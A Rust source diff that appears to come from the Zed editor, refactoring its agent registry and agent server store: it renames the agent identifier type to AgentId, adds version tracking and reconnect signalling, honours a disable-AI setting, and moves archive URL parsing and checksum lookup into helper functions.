pub struct RegistryAgentMetadata { - pub id: SharedString, + pub id: AgentId, pub name: SharedString, pub description: SharedString, pub version: SharedString, pub repository: Option, + pub website: Option, pub icon_path: Option, } @@ -55,7 +56,7 @@ impl RegistryAgent { } } - pub fn id(&self) -> &SharedString { + pub fn id(&self) -> &AgentId { &self.metadata().id } @@ -75,6 +76,10 @@ impl RegistryAgent { self.metadata().repository.as_ref() } + pub fn website(&self) -> Option<&SharedString> { + self.metadata().website.as_ref() + } + pub fn icon_path(&self) -> Option<&SharedString> { self.metadata().icon_path.as_ref() } @@ -129,13 +134,11 @@ impl AgentRegistryStore { let store = cx.new(|cx| Self::new(fs, http_client, cx)); cx.set_global(GlobalAgentRegistryStore(store.clone())); - if AllAgentServersSettings::get_global(cx).has_registry_agents() { - store.update(cx, |store, cx| { - if store.agents.is_empty() { - store.refresh(cx); - } - }); - } + store.update(cx, |store, cx| { + if store.agents.is_empty() { + store.refresh(cx); + } + }); store } @@ -149,12 +152,34 @@ impl AgentRegistryStore { .map(|store| store.0.clone()) } + #[cfg(any(test, feature = "test-support"))] + pub fn init_test_global(cx: &mut App, agents: Vec) -> Entity { + let fs: Arc = fs::FakeFs::new(cx.background_executor().clone()); + let store = cx.new(|_cx| Self { + fs, + http_client: http_client::FakeHttpClient::with_404_response(), + agents, + is_fetching: false, + fetch_error: None, + pending_refresh: None, + last_refresh: None, + }); + cx.set_global(GlobalAgentRegistryStore(store.clone())); + store + } + + #[cfg(any(test, feature = "test-support"))] + pub fn set_agents(&mut self, agents: Vec, cx: &mut Context) { + self.agents = agents; + cx.notify(); + } + pub fn agents(&self) -> &[RegistryAgent] { &self.agents } - pub fn agent(&self, id: &str) -> Option<&RegistryAgent> { - self.agents.iter().find(|agent| agent.id().as_ref() == id) + pub fn agent(&self, id: &AgentId) -> Option<&RegistryAgent> { + self.agents.iter().find(|agent| agent.id() == id) } pub fn is_fetching(&self) -> bool { @@ -173,6 +198,10 @@ impl AgentRegistryStore { return; } + if DisableAiSettings::get_global(cx).disable_ai { + return; + } + self.is_fetching = true; self.fetch_error = None; self.last_refresh = Some(Instant::now()); @@ -249,6 +278,10 @@ impl AgentRegistryStore { http_client: Arc, cx: &mut Context, ) { + if DisableAiSettings::get_global(cx).disable_ai { + return; + } + cx.spawn(async move |this, cx| -> Result<()> { let cache_path = registry_cache_path(); if !fs.is_file(&cache_path).await { @@ -342,11 +375,12 @@ async fn build_registry_agents( .await?; let metadata = RegistryAgentMetadata { - id: entry.id.into(), + id: AgentId::new(entry.id), name: entry.name.into(), description: entry.description.into(), version: entry.version.into(), repository: entry.repository.map(Into::into), + website: entry.website.map(Into::into), icon_path, }; @@ -546,6 +580,8 @@ struct RegistryEntry { #[serde(default)] repository: Option, #[serde(default)] + website: Option, + #[serde(default)] icon: Option, distribution: RegistryDistribution, } diff --git a/crates/project/src/agent_server_store.rs b/crates/project/src/agent_server_store.rs index b0c10086cac1c39c4570b416e790df85cdc55cf0..0b6bb2b739f677ca1f4f3d5558538372ec6e86ff 100644 --- a/crates/project/src/agent_server_store.rs +++ b/crates/project/src/agent_server_store.rs @@ -1,7 +1,6 @@ use remote::Interactive; use std::{ any::Any, - borrow::Borrow, path::{Path, PathBuf}, sync::Arc, time::Duration, @@ -13,6 +12,7 @@ use fs::Fs; use gpui::{AsyncApp, Context, Entity, EventEmitter, SharedString, Subscription, Task}; use http_client::{HttpClient, github::AssetKind}; use node_runtime::NodeRuntime; +use percent_encoding::percent_decode_str; use remote::RemoteClient; use rpc::{ AnyProtoClient, TypedEnvelope, @@ -21,12 +21,15 @@ use rpc::{ use schemars::JsonSchema; use serde::{Deserialize, Serialize}; use settings::{RegisterSetting, SettingsStore}; -use task::Shell; +use sha2::{Digest, Sha256}; +use url::Url; use util::{ResultExt as _, debug_panic}; use crate::ProjectEnvironment; use crate::agent_registry_store::{AgentRegistryStore, RegistryAgent, RegistryTargetConfig}; +use crate::worktree_store::WorktreeStore; + #[derive(Deserialize, Serialize, Clone, PartialEq, Eq, JsonSchema)] pub struct AgentServerCommand { #[serde(rename = "command")] @@ -61,28 +64,43 @@ impl std::fmt::Debug for AgentServerCommand { } } -#[derive(Clone, Debug, PartialEq, Eq, Hash, PartialOrd, Ord)] -pub struct ExternalAgentServerName(pub SharedString); +#[derive( + Clone, Debug, PartialEq, Eq, Hash, PartialOrd, Ord, Serialize, Deserialize, JsonSchema, +)] +#[serde(transparent)] +pub struct AgentId(pub SharedString); + +impl AgentId { + pub fn new(id: impl Into) -> Self { + AgentId(id.into()) + } +} -impl std::fmt::Display for ExternalAgentServerName { +impl std::fmt::Display for AgentId { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { write!(f, "{}", self.0) } } -impl From<&'static str> for ExternalAgentServerName { +impl From<&'static str> for AgentId { fn from(value: &'static str) -> Self { - ExternalAgentServerName(value.into()) + AgentId(value.into()) } } -impl From for SharedString { - fn from(value: ExternalAgentServerName) -> Self { +impl From for SharedString { + fn from(value: AgentId) -> Self { value.0 } } -impl Borrow for ExternalAgentServerName { +impl AsRef for AgentId { + fn as_ref(&self) -> &str { + &self.0 + } +} + +impl std::borrow::Borrow for AgentId { fn borrow(&self) -> &str { &self.0 } @@ -100,18 +118,32 @@ pub trait ExternalAgentServer { fn get_command( &mut self, extra_env: HashMap, - status_tx: Option>, new_version_available_tx: Option>>, cx: &mut AsyncApp, ) -> Task>; + fn version(&self) -> Option<&SharedString> { + None + } + + fn take_new_version_available_tx(&mut self) -> Option>> { + None + } + + fn set_new_version_available_tx(&mut self, _tx: watch::Sender>) {} + + fn as_any(&self) -> &dyn Any; fn as_any_mut(&mut self) -> &mut dyn Any; } -impl dyn ExternalAgentServer { - fn downcast_mut(&mut self) -> Option<&mut T> { - self.as_any_mut().downcast_mut() - } +struct ExtensionAgentEntry { + agent_name: Arc, + extension_id: String, + targets: HashMap, + env: HashMap, + icon_path: Option, + display_name: Option, + version: Option, } enum AgentServerStoreState { @@ -122,19 +154,13 @@ enum AgentServerStoreState { downstream_client: Option<(u64, AnyProtoClient)>, settings: Option, http_client: Arc, - extension_agents: Vec<( - Arc, - String, - HashMap, - HashMap, - Option, - Option, - )>, + extension_agents: Vec, _subscriptions: Vec, }, Remote { project_id: u64, upstream_client: Entity, + worktree_store: Entity, }, Collab, } @@ -164,7 +190,7 @@ impl ExternalAgentEntry { pub struct AgentServerStore { state: AgentServerStoreState, - pub external_agents: HashMap, + pub external_agents: HashMap, } pub struct AgentServersUpdated; @@ -202,14 +228,15 @@ impl AgentServerStore { resolve_extension_icon_path(&extensions_dir, ext_id, icon) }); - extension_agents.push(( - agent_name.clone(), - ext_id.to_owned(), - agent_entry.targets.clone(), - agent_entry.env.clone(), + extension_agents.push(ExtensionAgentEntry { + agent_name: agent_name.clone(), + extension_id: ext_id.to_owned(), + targets: agent_entry.targets.clone(), + env: agent_entry.env.clone(), icon_path, - Some(display_name), - )); + display_name: Some(display_name), + version: Some(SharedString::from(manifest.version.clone())), + }); } } self.reregister_agents(cx); @@ -217,6 +244,7 @@ impl AgentServerStore { AgentServerStoreState::Remote { project_id, upstream_client, + worktree_store, } => { let mut agents = vec![]; for (ext_id, manifest) in manifests { @@ -229,7 +257,7 @@ impl AgentServerStore { .as_ref() .map(|path| SharedString::from(path.clone())); let icon = icon_path; - let agent_server_name = ExternalAgentServerName(agent_name.clone().into()); + let agent_server_name = AgentId(agent_name.clone().into()); self.external_agents .entry(agent_server_name.clone()) .and_modify(|entry| { @@ -242,8 +270,8 @@ impl AgentServerStore { Box::new(RemoteExternalAgentServer { project_id: *project_id, upstream_client: upstream_client.clone(), + worktree_store: worktree_store.clone(), name: agent_server_name.clone(), - status_tx: None, new_version_available_tx: None, }) as Box, @@ -267,6 +295,7 @@ impl AgentServerStore { .iter() .map(|(k, v)| (k.clone(), v.clone())) .collect(), + version: Some(manifest.version.to_string()), }); } } @@ -287,13 +316,13 @@ impl AgentServerStore { cx.emit(AgentServersUpdated); } - pub fn agent_icon(&self, name: &ExternalAgentServerName) -> Option { + pub fn agent_icon(&self, id: &AgentId) -> Option { self.external_agents - .get(name) + .get(id) .and_then(|entry| entry.icon.clone()) } - pub fn agent_source(&self, name: &ExternalAgentServerName) -> Option { + pub fn agent_source(&self, name: &AgentId) -> Option { self.external_agents.get(name).map(|entry| entry.source) } } @@ -339,7 +368,7 @@ pub fn resolve_extension_icon_path( } impl AgentServerStore { - pub fn agent_display_name(&self, name: &ExternalAgentServerName) -> Option { + pub fn agent_display_name(&self, name: &AgentId) -> Option { self.external_agents .get(name) .and_then(|entry| entry.display_name.clone()) @@ -347,7 +376,6 @@ impl AgentServerStore { pub fn init_remote(session: &AnyProtoClient) { session.add_entity_message_handler(Self::handle_external_agents_updated); - session.add_entity_message_handler(Self::handle_loading_status_updated); session.add_entity_message_handler(Self::handle_new_version_available); } @@ -423,15 +451,28 @@ impl AgentServerStore { }) .unwrap_or_default(); - self.external_agents.clear(); + // Drain the existing versioned agents, extracting reconnect state + // from any active connection so we can preserve it or trigger a + // reconnect when the version changes. + let mut old_versioned_agents: HashMap< + AgentId, + (SharedString, watch::Sender>), + > = HashMap::default(); + for (name, mut entry) in self.external_agents.drain() { + if let Some(version) = entry.server.version().cloned() { + if let Some(tx) = entry.server.take_new_version_available_tx() { + old_versioned_agents.insert(name, (version, tx)); + } + } + } // Insert extension agents before custom/registry so registry entries override extensions. - for (agent_name, ext_id, targets, env, icon_path, display_name) in extension_agents.iter() { - let name = ExternalAgentServerName(agent_name.clone().into()); - let mut env = env.clone(); + for entry in extension_agents.iter() { + let name = AgentId(entry.agent_name.clone().into()); + let mut env = entry.env.clone(); if let Some(settings_env) = new_settings - .get(agent_name.as_ref()) + .get(entry.agent_name.as_ref()) .and_then(|settings| match settings { CustomAgentServerSettings::Extension { env, .. } => Some(env.clone()), _ => None, @@ -439,7 +480,8 @@ impl AgentServerStore { { env.extend(settings_env); } - let icon = icon_path + let icon = entry + .icon_path .as_ref() .map(|path| SharedString::from(path.clone())); @@ -451,14 +493,16 @@ impl AgentServerStore { http_client: http_client.clone(), node_runtime: node_runtime.clone(), project_environment: project_environment.clone(), - extension_id: Arc::from(&**ext_id), - targets: targets.clone(), + extension_id: Arc::from(&*entry.extension_id), + targets: entry.targets.clone(), env, - agent_id: agent_name.clone(), + agent_id: entry.agent_name.clone(), + version: entry.version.clone(), + new_version_available_tx: None, }) as Box, ExternalAgentSource::Extension, icon, - display_name.clone(), + entry.display_name.clone(), ), ); } @@ -466,7 +510,7 @@ impl AgentServerStore { for (name, settings) in new_settings.iter() { match settings { CustomAgentServerSettings::Custom { command, .. } => { - let agent_name = ExternalAgentServerName(name.clone().into()); + let agent_name = AgentId(name.clone().into()); self.external_agents.insert( agent_name.clone(), ExternalAgentEntry::new( @@ -488,7 +532,7 @@ impl AgentServerStore { continue; }; - let agent_name = ExternalAgentServerName(name.clone().into()); + let agent_name = AgentId(name.clone().into()); match agent { RegistryAgent::Binary(agent) => { if !agent.supports_current_platform { @@ -508,8 +552,10 @@ impl AgentServerStore { node_runtime: node_runtime.clone(), project_environment: project_environment.clone(), registry_id: Arc::from(name.as_str()), + version: agent.metadata.version.clone(), targets: agent.targets.clone(), env: env.clone(), + new_version_available_tx: None, }) as Box, ExternalAgentSource::Registry, @@ -525,10 +571,12 @@ impl AgentServerStore { Box::new(LocalRegistryNpxAgent { node_runtime: node_runtime.clone(), project_environment: project_environment.clone(), + version: agent.metadata.version.clone(), package: agent.package.clone(), args: agent.args.clone(), distribution_env: agent.env.clone(), settings_env: env.clone(), + new_version_available_tx: None, }) as Box, ExternalAgentSource::Registry, @@ -543,6 +591,24 @@ impl AgentServerStore { } } + // For each rebuilt versioned agent, compare the version. If it + // changed, notify the active connection to reconnect. Otherwise, + // transfer the channel to the new entry so future updates can use it. + for (name, entry) in &mut self.external_agents { + let Some((old_version, mut tx)) = old_versioned_agents.remove(name) else { + continue; + }; + let Some(new_version) = entry.server.version() else { + continue; + }; + + if new_version != &old_version { + tx.send(Some(new_version.to_string())).ok(); + } else { + entry.server.set_new_version_available_tx(tx); + } + } + *old_settings = Some(new_settings); if let Some((project_id, downstream_client)) = downstream_client { @@ -600,11 +666,16 @@ impl AgentServerStore { this } - pub(crate) fn remote(project_id: u64, upstream_client: Entity) -> Self { + pub(crate) fn remote( + project_id: u64, + upstream_client: Entity, + worktree_store: Entity, + ) -> Self { Self { state: AgentServerStoreState::Remote { project_id, upstream_client, + worktree_store, }, external_agents: HashMap::default(), } @@ -653,7 +724,7 @@ impl AgentServerStore { pub fn get_external_agent( &mut self, - name: &ExternalAgentServerName, + name: &AgentId, ) -> Option<&mut (dyn ExternalAgentServer + 'static)> { self.external_agents .get_mut(name) @@ -671,7 +742,11 @@ impl AgentServerStore { } } - pub fn external_agents(&self) -> impl Iterator { + pub fn has_external_agents(&self) -> bool { + !self.external_agents.is_empty() + } + + pub fn external_agents(&self) -> impl Iterator { self.external_agents.keys() } @@ -695,57 +770,38 @@ impl AgentServerStore { .get_mut(&*envelope.payload.name) .map(|entry| entry.server.as_mut()) .with_context(|| format!("agent `{}` not found", envelope.payload.name))?; - let (status_tx, new_version_available_tx) = downstream_client - .clone() - .map(|(project_id, downstream_client)| { - let (status_tx, mut status_rx) = watch::channel(SharedString::from("")); - let (new_version_available_tx, mut new_version_available_rx) = - watch::channel(None); - cx.spawn({ - let downstream_client = downstream_client.clone(); - let name = envelope.payload.name.clone(); - async move |_, _| { - while let Some(status) = status_rx.recv().await.ok() { - downstream_client.send( - proto::ExternalAgentLoadingStatusUpdated { - project_id, - name: name.clone(), - status: status.to_string(), - }, - )?; + let new_version_available_tx = + downstream_client + .clone() + .map(|(project_id, downstream_client)| { + let (new_version_available_tx, mut new_version_available_rx) = + watch::channel(None); + cx.spawn({ + let name = envelope.payload.name.clone(); + async move |_, _| { + if let Some(version) = + new_version_available_rx.recv().await.ok().flatten() + { + downstream_client.send( + proto::NewExternalAgentVersionAvailable { + project_id, + name: name.clone(), + version, + }, + )?; + } + anyhow::Ok(()) } - anyhow::Ok(()) - } - }) - .detach_and_log_err(cx); - cx.spawn({ - let name = envelope.payload.name.clone(); - async move |_, _| { - if let Some(version) = - new_version_available_rx.recv().await.ok().flatten() - { - downstream_client.send( - proto::NewExternalAgentVersionAvailable { - project_id, - name: name.clone(), - version, - }, - )?; - } - anyhow::Ok(()) - } - }) - .detach_and_log_err(cx); - (status_tx, new_version_available_tx) - }) - .unzip(); + }) + .detach_and_log_err(cx); + new_version_available_tx + }); let mut extra_env = HashMap::default(); if no_browser { extra_env.insert("NO_BROWSER".to_owned(), "1".to_owned()); } anyhow::Ok(agent.get_command( extra_env, - status_tx, new_version_available_tx, &mut cx.to_async(), )) @@ -758,8 +814,10 @@ impl AgentServerStore { .env .map(|env| env.into_iter().collect()) .unwrap_or_default(), - // root_dir and login are no longer used, but returned for backwards compatibility - root_dir: paths::home_dir().to_string_lossy().to_string(), + root_dir: envelope + .payload + .root_dir + .unwrap_or_else(|| paths::home_dir().to_string_lossy().to_string()), login: None, }) } @@ -773,6 +831,7 @@ impl AgentServerStore { let AgentServerStoreState::Remote { project_id, upstream_client, + worktree_store, } = &this.state else { debug_panic!( @@ -782,15 +841,12 @@ impl AgentServerStore { }; let mut previous_entries = std::mem::take(&mut this.external_agents); - let mut status_txs = HashMap::default(); let mut new_version_available_txs = HashMap::default(); let mut metadata = HashMap::default(); for (name, mut entry) in previous_entries.drain() { - if let Some(agent) = entry.server.downcast_mut::() { - status_txs.insert(name.clone(), agent.status_tx.take()); - new_version_available_txs - .insert(name.clone(), agent.new_version_available_tx.take()); + if let Some(tx) = entry.server.take_new_version_available_tx() { + new_version_available_txs.insert(name.clone(), tx); } metadata.insert(name, (entry.icon, entry.display_name, entry.source)); @@ -801,12 +857,12 @@ impl AgentServerStore { .names .into_iter() .map(|name| { - let agent_name = ExternalAgentServerName(name.into()); + let agent_id = AgentId(name.into()); let (icon, display_name, source) = metadata - .remove(&agent_name) + .remove(&agent_id) .or_else(|| { AgentRegistryStore::try_global(cx) - .and_then(|store| store.read(cx).agent(&agent_name.0)) + .and_then(|store| store.read(cx).agent(&agent_id)) .map(|s| { ( s.icon_path().cloned(), @@ -819,14 +875,12 @@ impl AgentServerStore { let agent = RemoteExternalAgentServer { project_id: *project_id, upstream_client: upstream_client.clone(), - name: agent_name.clone(), - status_tx: status_txs.remove(&agent_name).flatten(), - new_version_available_tx: new_version_available_txs - .remove(&agent_name) - .flatten(), + worktree_store: worktree_store.clone(), + name: agent_id.clone(), + new_version_available_tx: new_version_available_txs.remove(&agent_id), }; ( - agent_name, + agent_id, ExternalAgentEntry::new( Box::new(agent) as Box, source, @@ -857,25 +911,28 @@ impl AgentServerStore { ); }; + extension_agents.clear(); for ExternalExtensionAgent { name, icon_path, extension_id, targets, env, + version, } in envelope.payload.agents { - extension_agents.push(( - Arc::from(&*name), + extension_agents.push(ExtensionAgentEntry { + agent_name: Arc::from(&*name), extension_id, - targets + targets: targets .into_iter() .map(|(k, v)| (k, extension::TargetConfig::from_proto(v))) .collect(), - env.into_iter().collect(), + env: env.into_iter().collect(), icon_path, - None, - )); + display_name: None, + version: version.map(SharedString::from), + }); } this.reregister_agents(cx); @@ -884,48 +941,27 @@ impl AgentServerStore { }) } - async fn handle_loading_status_updated( - this: Entity, - envelope: TypedEnvelope, - mut cx: AsyncApp, - ) -> Result<()> { - this.update(&mut cx, |this, _| { - if let Some(agent) = this.external_agents.get_mut(&*envelope.payload.name) - && let Some(agent) = agent.server.downcast_mut::() - && let Some(status_tx) = &mut agent.status_tx - { - status_tx.send(envelope.payload.status.into()).ok(); - } - }); - Ok(()) - } - async fn handle_new_version_available( this: Entity, envelope: TypedEnvelope, mut cx: AsyncApp, ) -> Result<()> { this.update(&mut cx, |this, _| { - if let Some(agent) = this.external_agents.get_mut(&*envelope.payload.name) - && let Some(agent) = agent.server.downcast_mut::() - && let Some(new_version_available_tx) = &mut agent.new_version_available_tx + if let Some(entry) = this.external_agents.get_mut(&*envelope.payload.name) + && let Some(mut tx) = entry.server.take_new_version_available_tx() { - new_version_available_tx - .send(Some(envelope.payload.version)) - .ok(); + tx.send(Some(envelope.payload.version)).ok(); + entry.server.set_new_version_available_tx(tx); } }); Ok(()) } - pub fn get_extension_id_for_agent( - &mut self, - name: &ExternalAgentServerName, - ) -> Option> { - self.external_agents.get_mut(name).and_then(|entry| { + pub fn get_extension_id_for_agent(&self, name: &AgentId) -> Option> { + self.external_agents.get(name).and_then(|entry| { entry .server - .as_any_mut() + .as_any() .downcast_ref::() .map(|ext_agent| ext_agent.extension_id.clone()) }) @@ -935,25 +971,39 @@ impl AgentServerStore { struct RemoteExternalAgentServer { project_id: u64, upstream_client: Entity, - name: ExternalAgentServerName, - status_tx: Option>, + worktree_store: Entity, + name: AgentId, new_version_available_tx: Option>>, } impl ExternalAgentServer for RemoteExternalAgentServer { + fn take_new_version_available_tx(&mut self) -> Option>> { + self.new_version_available_tx.take() + } + + fn set_new_version_available_tx(&mut self, tx: watch::Sender>) { + self.new_version_available_tx = Some(tx); + } + fn get_command( &mut self, extra_env: HashMap, - status_tx: Option>, new_version_available_tx: Option>>, cx: &mut AsyncApp, ) -> Task> { let project_id = self.project_id; let name = self.name.to_string(); let upstream_client = self.upstream_client.downgrade(); - self.status_tx = status_tx; + let worktree_store = self.worktree_store.clone(); self.new_version_available_tx = new_version_available_tx; cx.spawn(async move |cx| { + let root_dir = worktree_store.read_with(cx, |worktree_store, cx| { + crate::Project::default_visible_worktree_paths(worktree_store, cx) + .into_iter() + .next() + .map(|path| path.display().to_string()) + }); + let mut response = upstream_client .update(cx, |upstream_client, _| { upstream_client @@ -961,7 +1011,7 @@ impl ExternalAgentServer for RemoteExternalAgentServer { .request(proto::GetAgentServerCommand { project_id, name, - root_dir: None, + root_dir, }) })? .await?; @@ -985,11 +1035,106 @@ impl ExternalAgentServer for RemoteExternalAgentServer { }) } + fn as_any(&self) -> &dyn Any { + self + } + fn as_any_mut(&mut self) -> &mut dyn Any { self } } +fn asset_kind_for_archive_url(archive_url: &str) -> Result { + let archive_path = Url::parse(archive_url) + .ok() + .map(|url| url.path().to_string()) + .unwrap_or_else(|| archive_url.to_string()); + + if archive_path.ends_with(".zip") { + Ok(AssetKind::Zip) + } else if archive_path.ends_with(".tar.gz") || archive_path.ends_with(".tgz") { + Ok(AssetKind::TarGz) + } else if archive_path.ends_with(".tar.bz2") || archive_path.ends_with(".tbz2") { + Ok(AssetKind::TarBz2) + } else { + bail!("unsupported archive type in URL: {archive_url}"); + } +} + +struct GithubReleaseArchive { + repo_name_with_owner: String, + tag: String, + asset_name: String, +} + +fn github_release_archive_from_url(archive_url: &str) -> Option { + fn decode_path_segment(segment: &str) -> Option { + percent_decode_str(segment) + .decode_utf8() + .ok() + .map(|segment| segment.into_owned()) + } + + let url = Url::parse(archive_url).ok()?; + if url.scheme() != "https" || url.host_str()? != "github.com" { + return None; + } + + let segments = url.path_segments()?.collect::>(); + if segments.len() < 6 || segments[2] != "releases" || segments[3] != "download" { + return None; + } + + Some(GithubReleaseArchive { + repo_name_with_owner: format!("{}/{}", segments[0], segments[1]), + tag: decode_path_segment(segments[4])?, + asset_name: segments[5..] + .iter() + .map(|segment| decode_path_segment(segment)) + .collect::>>()? + .join("/"), + }) +} + +fn sanitized_version_component(version: &str) -> String { + let sanitized = version + .chars() + .map(|character| match character { + 'a'..='z' | 'A'..='Z' | '0'..='9' | '.' | '_' | '-' => character, + _ => '-', + }) + .collect::(); + + if sanitized.is_empty() { + "unknown".to_string() + } else { + sanitized + } +} + +fn versioned_archive_cache_dir( + base_dir: &Path, + version: Option<&str>, + archive_url: &str, +) -> PathBuf { + let version = version.unwrap_or_default(); + let sanitized_version = sanitized_version_component(version); + + let mut version_hasher = Sha256::new(); + version_hasher.update(version.as_bytes()); + let version_hash = format!("{:x}", version_hasher.finalize()); + + let mut url_hasher = Sha256::new(); + url_hasher.update(archive_url.as_bytes()); + let url_hash = format!("{:x}", url_hasher.finalize()); + + base_dir.join(format!( + "v_{sanitized_version}_{}_{}", + &version_hash[..16], + &url_hash[..16], + )) +} + pub struct LocalExtensionArchiveAgent { pub fs: Arc, pub http_client: Arc, @@ -999,16 +1144,30 @@ pub struct LocalExtensionArchiveAgent { pub agent_id: Arc, pub targets: HashMap, pub env: HashMap, + pub version: Option, + pub new_version_available_tx: Option>>, } impl ExternalAgentServer for LocalExtensionArchiveAgent { + fn version(&self) -> Option<&SharedString> { + self.version.as_ref() + } + + fn take_new_version_available_tx(&mut self) -> Option>> { + self.new_version_available_tx.take() + } + + fn set_new_version_available_tx(&mut self, tx: watch::Sender>) { + self.new_version_available_tx = Some(tx); + } + fn get_command( &mut self, extra_env: HashMap, - _status_tx: Option>, - _new_version_available_tx: Option>>, + new_version_available_tx: Option>>, cx: &mut AsyncApp, ) -> Task> { + self.new_version_available_tx = new_version_available_tx; let fs = self.fs.clone(); let http_client = self.http_client.clone(); let node_runtime = self.node_runtime.clone(); @@ -1017,16 +1176,13 @@ impl ExternalAgentServer for LocalExtensionArchiveAgent { let agent_id = self.agent_id.clone(); let targets = self.targets.clone(); let base_env = self.env.clone(); + let version = self.version.clone(); cx.spawn(async move |cx| { // Get project environment let mut env = project_environment .update(cx, |project_environment, cx| { - project_environment.local_directory_environment( - &Shell::System, - paths::home_dir().as_path().into(), - cx, - ) + project_environment.default_environment(cx) })? .await .unwrap_or_default(); @@ -1072,56 +1228,38 @@ impl ExternalAgentServer for LocalExtensionArchiveAgent { })?; let archive_url = &target_config.archive; - - // Use URL as version identifier for caching - // Hash the URL to get a stable directory name - use std::collections::hash_map::DefaultHasher; - use std::hash::{Hash, Hasher}; - let mut hasher = DefaultHasher::new(); - archive_url.hash(&mut hasher); - let url_hash = hasher.finish(); - let version_dir = dir.join(format!("v_{:x}", url_hash)); + let version_dir = versioned_archive_cache_dir( + &dir, + version.as_ref().map(|version| version.as_ref()), + archive_url, + ); if !fs.is_dir(&version_dir).await { // Determine SHA256 for verification let sha256 = if let Some(provided_sha) = &target_config.sha256 { // Use provided SHA256 Some(provided_sha.clone()) - } else if archive_url.starts_with("https://github.com/") { + } else if let Some(github_archive) = github_release_archive_from_url(archive_url) { // Try to fetch SHA256 from GitHub API - // Parse URL to extract repo and tag/file info - // Format: https://github.com/owner/repo/releases/download/tag/file.zip - if let Some(caps) = archive_url.strip_prefix("https://github.com/") { - let parts: Vec<&str> = caps.split('/').collect(); - if parts.len() >= 6 && parts[2] == "releases" && parts[3] == "download" { - let repo = format!("{}/{}", parts[0], parts[1]); - let tag = parts[4]; - let filename = parts[5..].join("/"); - - // Try to get release info from GitHub - if let Ok(release) = ::http_client::github::get_release_by_tag_name( - &repo, - tag, - http_client.clone(), - ) - .await - { - // Find matching asset - if let Some(asset) = - release.assets.iter().find(|a| a.name == filename) - { - // Strip "sha256:" prefix if present - asset.digest.as_ref().map(|d| { - d.strip_prefix("sha256:") - .map(|s| s.to_string()) - .unwrap_or_else(|| d.clone()) - }) - } else { - None - } - } else { - None - } + if let Ok(release) = ::http_client::github::get_release_by_tag_name( + &github_archive.repo_name_with_owner, + &github_archive.tag, + http_client.clone(), + ) + .await + { + // Find matching asset + if let Some(asset) = release + .assets + .iter() + .find(|a| a.name == github_archive.asset_name) + { + // Strip "sha256:" prefix if present + asset.digest.as_ref().map(|d| { + d.strip_prefix("sha256:") + .map(|s| s.to_string()) + .unwrap_or_else(|| d.clone()) + }) } else { None } @@ -1132,14 +1270,7 @@ impl ExternalAgentServer for LocalExtensionArchiveAgent { None }; - // Determine archive type from URL - let asset_kind = if archive_url.ends_with(".zip") { - AssetKind::Zip - } else if archive_url.ends_with(".tar.gz") || archive_url.ends_with(".tgz") { - AssetKind::TarGz - } else { - anyhow::bail!("unsupported archive type in URL: {}", archive_url); - }; + let asset_kind = asset_kind_for_archive_url(archive_url)?; // Download and extract ::http_client::github_download::download_server_binary( @@ -1188,6 +1319,10 @@ impl ExternalAgentServer for LocalExtensionArchiveAgent { }) } + fn as_any(&self) -> &dyn Any { + self + } + fn as_any_mut(&mut self) -> &mut dyn Any { self } @@ -1199,18 +1334,32 @@ struct LocalRegistryArchiveAgent { node_runtime: NodeRuntime, project_environment: Entity, registry_id: Arc, + version: SharedString, targets: HashMap, env: HashMap, + new_version_available_tx: Option>>, } impl ExternalAgentServer for LocalRegistryArchiveAgent { + fn version(&self) -> Option<&SharedString> { + Some(&self.version) + } + + fn take_new_version_available_tx(&mut self) -> Option>> { + self.new_version_available_tx.take() + } + + fn set_new_version_available_tx(&mut self, tx: watch::Sender>) { + self.new_version_available_tx = Some(tx); + } + fn get_command( &mut self, extra_env: HashMap, - _status_tx: Option>, - _new_version_available_tx: Option>>, + new_version_available_tx: Option>>, cx: &mut AsyncApp, ) -> Task> { + self.new_version_available_tx = new_version_available_tx; let fs = self.fs.clone(); let http_client = self.http_client.clone(); let node_runtime = self.node_runtime.clone(); @@ -1218,15 +1367,12 @@ impl ExternalAgentServer for LocalRegistryArchiveAgent { let registry_id = self.registry_id.clone(); let targets = self.targets.clone(); let settings_env = self.env.clone(); + let version = self.version.clone(); cx.spawn(async move |cx| { let mut env = project_environment .update(cx, |project_environment, cx| { - project_environment.local_directory_environment( - &Shell::System, - paths::home_dir().as_path().into(), - cx, - ) + project_environment.default_environment(cx) })? .await .unwrap_or_default(); @@ -1272,46 +1418,30 @@ impl ExternalAgentServer for LocalRegistryArchiveAgent { env.extend(settings_env); let archive_url = &target_config.archive; - - use std::collections::hash_map::DefaultHasher; - use std::hash::{Hash, Hasher}; - let mut hasher = DefaultHasher::new(); - archive_url.hash(&mut hasher); - let url_hash = hasher.finish(); - let version_dir = dir.join(format!("v_{:x}", url_hash)); + let version_dir = + versioned_archive_cache_dir(&dir, Some(version.as_ref()), archive_url); if !fs.is_dir(&version_dir).await { let sha256 = if let Some(provided_sha) = &target_config.sha256 { Some(provided_sha.clone()) - } else if archive_url.starts_with("https://github.com/") { - if let Some(caps) = archive_url.strip_prefix("https://github.com/") { - let parts: Vec<&str> = caps.split('/').collect(); - if parts.len() >= 6 && parts[2] == "releases" && parts[3] == "download" { - let repo = format!("{}/{}", parts[0], parts[1]); - let tag = parts[4]; - let filename = parts[5..].join("/"); - - if let Ok(release) = ::http_client::github::get_release_by_tag_name( - &repo, - tag, - http_client.clone(), - ) - .await - { - if let Some(asset) = - release.assets.iter().find(|a| a.name == filename) - { - asset.digest.as_ref().and_then(|d| { - d.strip_prefix("sha256:") - .map(|s| s.to_string()) - .or_else(|| Some(d.clone())) - }) - } else { - None - } - } else { - None - } + } else if let Some(github_archive) = github_release_archive_from_url(archive_url) { + if let Ok(release) = ::http_client::github::get_release_by_tag_name( + &github_archive.repo_name_with_owner, + &github_archive.tag, + http_client.clone(), + ) + .await + { + if let Some(asset) = release + .assets + .iter() + .find(|a| a.name == github_archive.asset_name) + { + asset.digest.as_ref().and_then(|d| { + d.strip_prefix("sha256:") + .map(|s| s.to_string()) + .or_else(|| Some(d.clone())) + }) } else { None } @@ -1322,13 +1452,7 @@ impl ExternalAgentServer for LocalRegistryArchiveAgent { None }; - let asset_kind = if archive_url.ends_with(".zip") { - AssetKind::Zip - } else if archive_url.ends_with(".tar.gz") || archive_url.ends_with(".tgz") { - AssetKind::TarGz - } else { - anyhow::bail!("unsupported archive type in URL: {}", archive_url); - }; + let asset_kind = asset_kind_for_archive_url(archive_url)?; ::http_client::github_download::download_server_binary( &*http_client, @@ -1372,6 +1496,10 @@ impl ExternalAgentServer for LocalRegistryArchiveAgent { }) } + fn as_any(&self) -> &dyn Any { + self + } + fn as_any_mut(&mut self) -> &mut dyn Any { self } @@ 